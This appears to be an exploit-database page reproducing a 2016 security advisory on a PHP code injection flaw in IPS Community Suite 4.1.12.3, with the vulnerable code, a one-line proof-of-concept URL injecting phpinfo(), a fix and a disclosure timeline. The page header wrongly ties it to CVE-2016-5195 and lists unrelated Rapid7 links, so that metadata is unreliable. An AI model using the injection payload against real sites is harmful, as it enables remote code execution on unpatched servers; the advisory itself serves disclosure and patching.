header-logo
Suggest Exploit
vendor:
IPS Community Suite
by:
Anonymous
7,8
CVSS
HIGH
PHP Code Injection
94
CWE
Product Name: IPS Community Suite
Affected Version From: 4.1.12.3
Affected Version To: 4.1.12.3
Patch Exists: YES
Related CWE: CVE-2016-5195
CPE: a:invision_power_services:ips_community_suite
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/panos-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/cisco-nx-os-cisco-sa-20161026-linux/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-5195/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7852/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7702/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7701/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2015-5195/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-5219/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-7852/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-5195/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-7692/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-5219/https://www.rapid7.com/db/?q=CVE-2016-5195&type=&page=2https://www.rapid7.com/db/?q=CVE-2016-5195&type=&page=3https://www.rapid7.com/db/?q=CVE-2016-5195&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016

IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability

The vulnerable code is located in the /applications/core/modules/front/system/content.php script. User input passed through the 'content_class' request parameter is not properly sanitized before being used in a call to the 'class_exists()' function at line 40. This could be exploited by unauthenticated attackers to inject and execute arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script. Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8.

Mitigation:

Update to version 4.1.13 or later.
Source

Exploit-DB raw data:

---------------------------------------------------------------------------
IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability
---------------------------------------------------------------------------


[-] Software Link:

https://invisionpower.com/


[-] Affected Versions:

Version 4.1.12.3 and prior versions.


[-] Vulnerability Description:

The vulnerable code is located in the /applications/core/modules/front/system/content.php script:

38.	$class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) );
39.	
40.	if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) )
41.	{
42.	    \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' );
43.	}

User input passed through the "content_class" request parameter is not properly sanitized before being used in a call
to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute
arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script:

171.	if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) )
172.	{
173.	    $databaseId = mb_substr( $class, 14 );
174.	    eval( "namespace IPS\\cms; class Fields{$databaseId} extends Fields { public static \$customDatabaseId [...]
175.	}

Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8.


[-] Proof of Concept:

http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/*


[-] Solution:

Update to version 4.1.13 or later.


[-] Disclosure Timeline:

[04/07/2016] - Vendor notified
[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/
[06/07/2016] - CVE number requested
[06/07/2016] - CVE number assigned
[07/07/2016] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2016-6174 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-11